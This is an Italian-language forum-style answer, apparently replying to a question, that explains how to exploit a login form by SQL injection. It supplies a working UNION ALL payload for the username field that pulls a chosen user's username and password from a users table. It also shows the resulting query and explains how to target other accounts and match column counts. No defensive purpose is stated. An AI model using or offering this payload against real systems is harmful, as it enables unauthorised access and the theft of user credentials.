Molto probabilmente la query sql di login dovrebbe apparire così.
select * from table
where username='user' and password='pass'
Ora il tuo obiettivo è ottenere la riga corrispondente al valore specificato come "nome utente".
Quindi, per quello basta iniettare una query UNION , meglio non essere più confusi con altri metodi.
Qui sotto va il valore del campo "username".
' UNION ALL SELECT username,password from users where username='ShihabSoft' --
Quindi, dopo aver iniettato l'ultima query apparirà così.
select * from users where username='' UNION ALL SELECT username,password from users where username='ShihabSoft' --
Quindi se vuoi ottenere la riga di un utente specificato, cambia il valore 'ShihabSoft' in qualsiasi altro nome utente.
Ed è solo per un esempio perché non hai nemmeno specificato la query nella tua domanda.Quindi il numero di colonne nella query UNION potrebbe differire in base al numero di colonne specificato nell'attuale query.